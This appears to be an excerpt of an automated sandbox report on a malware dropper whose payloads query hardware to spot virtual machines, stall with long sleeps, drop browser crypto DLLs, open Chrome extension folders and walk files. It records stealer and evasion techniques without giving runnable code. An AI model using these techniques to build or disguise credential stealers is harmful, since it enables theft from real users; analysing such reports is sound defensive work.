                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe TID: 6416Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe TID: 7592Thread sleep time: -85000s >= -30000s
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe TID: 788Thread sleep time: -135000s >= -30000s
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 5884Thread sleep count: 43 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWindow / User API: threadDelayed 2515
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8914
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-23889
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeAPI coverage: 3.9 %
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Alwgckdftdslvwbqpdbjc13t.exeJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exeDropped PE file which has not been started: C:\Users\user\TypeRes\DllResource.exeJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeRegistry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040ABD8 LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,14_2_0040ABD8
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeAPI call chain: ExitProcess graph end nodegraph_14-23391
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeAPI call chain: ExitProcess graph end nodegraph_16-8668
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeAPI call chain: ExitProcess graph end nodegraph_16-8674
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeAPI call chain: ExitProcess graph end nodegraph_16-8672
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeAPI call chain: ExitProcess graph end nodegraph_16-8643
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                    Source: SETUP_~1.EXE, 00000028.00000002.850426547.0000000000E00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                    Source: F0geI.exe, 0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.406575357.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.308958287.0000000000713000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.398228449.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.390750632.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413737168.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`?t%SystemRoot%\system32\mswsock.dll
                    Source: F0geI.exe, 0000000E.00000003.368594122.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000002.468773615.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.391415880.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.372312694.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.359080753.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.407719860.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.412792997.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413897712.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.308993254.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.378491728.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.397115573.000000000073F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: namdoitntn.exe, 00000015.00000002.867825172.00000000031C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: zY617Pdb99+1WvhcD7lo3FrSKwd1Cywd9LMVGmivfhxbGU1DY8x/52zJ+c5pbJNXY0S4sBVdcTu5rKMgFogiqY6ISARX9l0yYlvGnbncaCtzr/0KVM7X9EJNQLEjjeZR2Vb0ytK0gg2tqs+dmyVc5c0X1qCQmPhKEyLEKk0YBV9pIjjEUA53pQGfnnX09MwvgJ4e6CWbxptV1ZgyjYpiWdgKTkH2TdVeQqM4L8IoRtIjkUbhfOeUN+xV3hYhKvrikbZ3Bf2FyyFRKpLoBrLTpcVoJjGKabpfOB86RFe6KtLroDs03pzDlurQGdVCjU/W5TnlqFxWtHNsd4I6NeFxcZ2acDGnUxNBw3VqonnECB6qq0xLVx96B+jq3b1k23jTNg6qFqphvIIqVsuqBtqdNjQNer2RDdGINBptc/R79wobkgS+woYIsQobRsFX2AgOMZSDdr7HsPM9KuVa7dr9n4T6+kgvuRxRs6qmjZc1mqUZu1ldAq29oIdczJR1VG6CA+2vStvIRpmJlRYVMGW7BGor1QGuCL3ZtLSVXK4wBUPPtCRXqyakQ7GEVbOyZinSZrLO/b0hL2FhW6yHsgVbDyc1TsxcmjzVN1SuVX3DiTzVN5JJjGKimpVQs/l0gWn2jk+//+7Vpz/9vu81hXe61VsxDcuanDXluoK1eIj0M6PqNG/l8oYQAIr7W8tw8WFy2Q2s98fJCyHy15CtPtVyEqCKDakQ8LVkm1+dPrQYjKYqLNCRYW6kZZwf/hFU7mf0kcE2xDEkaEThL2VGXlDg13oDa3eaXOjYJ7SC5bLYHVMcIZe2lNNuPmMBIaoWEBFCd8Rvkb1+vYYIg5LEVHfKaXJlgLYjOMWunOjRO6PzkXTHo0M3+H29ZGeLYAKknU40HYOYSxMw6DyhT9bZSP1qX5NR3h0TXfwdMuxTVSQC8rY7FZP8FrLfr7Su7GI89ulB7BClaQM7Bg1sqt2NHGHdSOFrfSTb4dItFQZzN8qmSpsSFyUkcqpm6MrxZr2s0LmZ
                    Source: safert44.exe, 00000017.00000002.845329570.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                    Source: namdoitntn.exe, 00000015.00000002.843763487.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess information queried: ProcessInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_004092CF LocalAlloc,LocalAlloc,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,GetSystemInfo,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,14_2_004092CF
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,14_2_004052DA
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose,14_2_00405B5B
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,14_2_0040196E
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,14_2_0040B177
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,14_2_00401B05
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,14_2_0040AE06
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,14_2_00403C8F
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,14_2_00401E18
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,14_2_0040633E
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,14_2_004039D7
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,14_2_00406725
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,16_2_004039D7
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,16_2_004052DA
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,16_2_00405B5B
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0040196E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,16_2_0040196E
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,16_2_0040B177
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00401B05 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,16_2_00401B05
